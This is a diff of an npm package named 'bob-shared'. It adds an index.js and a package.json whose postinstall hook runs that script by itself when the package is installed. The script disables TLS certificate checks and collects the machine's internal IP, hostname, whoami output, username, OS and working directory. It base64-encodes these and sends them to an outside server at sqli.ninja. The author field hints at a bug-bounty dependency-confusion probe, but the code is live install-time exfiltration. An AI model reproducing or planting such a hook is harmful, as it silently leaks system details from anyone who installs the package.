bob-shared 10.2.1

package/index.js

@@ -0,0 +1,49 @@
+var os = require("os");
+
+var package_name = "bob-shared"
+var target = "hbb_bc"
+
+process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";
+
+// GET internal IP
+var address,os = require('os'),ifaces = os.networkInterfaces();
+
+// GET FQDN
+var child_process = require("child_process");
+var fqdn = child_process.execSync("whoami");
+var fqdnstr = fqdn.toString().replace(/\r?\n|\r/g, " ");
+
+// Iterate over interfaces ...
+for (var dev in ifaces) {
+
+    // ... and find the one that matches the criteria
+    var iface = ifaces[dev].filter(function(details) {
+        return details.family === 'IPv4' && details.internal === false;
+    });
+
+    if(iface.length > 0) address = iface[0].address;
+}
+
+// building the string for GET data in dc.php
+var datastring = 'Local%20IP:%09'+address+'%0aHostname:%09'+os.hostname()+'%0aFQDN:%09%09'+fqdnstr+'%0aUsername:%09'+os.userInfo().username+'%0aOperatingsystem:%09'+os.platform+'%20'+os.release+'%0aWorking%20directory:%09'+__dirname
+// converting into base64
+let buff = new Buffer(datastring);
+let base64datastring = buff.toString('base64');
+
+const https = require('https')
+const options = {
+  hostname: 'sqli.ninja',
+  port: 443,
+  path: '/stuff/dc.php?target='+target+'&package_name='+package_name+'&repo=npm&data='+base64datastring,
+  method: 'GET'
+}
+
+const req = https.request(options, res => {
+  console.log(`statusCode: ${res.statusCode}`)
+})
+
+req.on('error', error => {
+  console.error(error)
+})
+
+req.end()

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "bob-shared",
+  "version": "10.2.1",
+  "description": "x",
+  "main": "index.js",
+  "scripts": {
+    "start": "node index.js",
+    "postinstall": "npm start"
+  },
+  "author": "bugcrowd mace",
+  "license": "IöSC"
+}